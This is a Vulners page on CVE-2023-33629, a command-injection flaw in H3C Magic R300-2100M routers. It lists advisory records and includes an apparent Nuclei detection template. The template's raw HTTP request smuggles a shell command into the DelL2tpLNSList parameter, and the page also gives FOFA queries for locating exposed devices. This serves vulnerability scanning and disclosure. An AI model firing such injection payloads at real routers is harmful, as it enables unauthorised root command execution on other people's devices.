| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2023-33629 | 31 May 202321:15 | – | attackerkb | |
| CVE-2023-33629 | 17 Nov 202309:27 | – | circl | |
| H3C Magic R300-2100M 缓冲区错误漏洞 | 31 May 202300:00 | – | cnnvd | |
| H3C Magic R300 Stack Overflow Vulnerability (CNVD-2023-52054) | 5 Jun 202300:00 | – | cnvd | |
| CVE-2023-33629 | 31 May 202300:00 | – | cve | |
| CVE-2023-33629 | 31 May 202300:00 | – | cvelist | |
| CVE-2023-33629 | 31 May 202321:15 | – | nvd | |
| CVE-2023-33629 | 31 May 202321:15 | – | osv | |
| Stack overflow | 31 May 202321:15 | – | prion | |
| PT-2023-24414 · H3C · H3C Magic R300 | 31 May 202300:00 | – | ptsecurity |
id: CVE-2023-33629
info:
name: H3C Magic R300-2100M - Remote Code Execution
author: DhiyaneshDK
severity: high
description: |
H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.
impact: |
Authenticated high-privilege attackers can exploit stack overflow through command injection in the DelL2tpLNSList parameter to execute arbitrary commands on the H3C Magic R300 router with root privileges.
remediation: |
Update H3C Magic R300-2100M firmware to a version newer than R300-2100MV100R004 that properly validates input in the DeltriggerList interface at /goform/aspForm.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-33629
- https://hackmd.io/@0dayResearch/r1UjggZfh
- https://hackmd.io/%400dayResearch/r1UjggZfh
- https://github.com/20142995/sectool
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2023-33629
cwe-id: CWE-787
epss-score: 0.04353
epss-percentile: 0.90052
cpe: cpe:2.3:o:h3c:magic_r300-2100m_firmware:r300-2100mv100r004:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: h3c
product: magic_r300-2100m_firmware
fofa-query:
- app="H3C-Ent-Router"
- app="h3c-ent-router"
tags: cve2023,cve,router,rce,h3c,vkev,vuln
variables:
filename: "{{to_lower(rand_text_alpha(7))}}"
http:
- raw:
- |
POST /goform/aspForm HTTP/1.1
Host: {{Hostname}}
CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp¶m=1; $(ls>/www/{{filename}});
- |
GET /{{filename}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code_1 == 302
- contains(body_1, 'do_cmd.asp')
- status_code_2 == 200
- contains_all(body_2, 'www', 'www_multi')
condition: and
# digest: 490a0046304402200f506d000769ece791fe22a13fa1ad467a936f9f2730ed091e9e60bb22f20c15022065eba5d519e09985615a1cde1de65fe8ba871bfe3e70f20190fd98cf1b670d8a:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation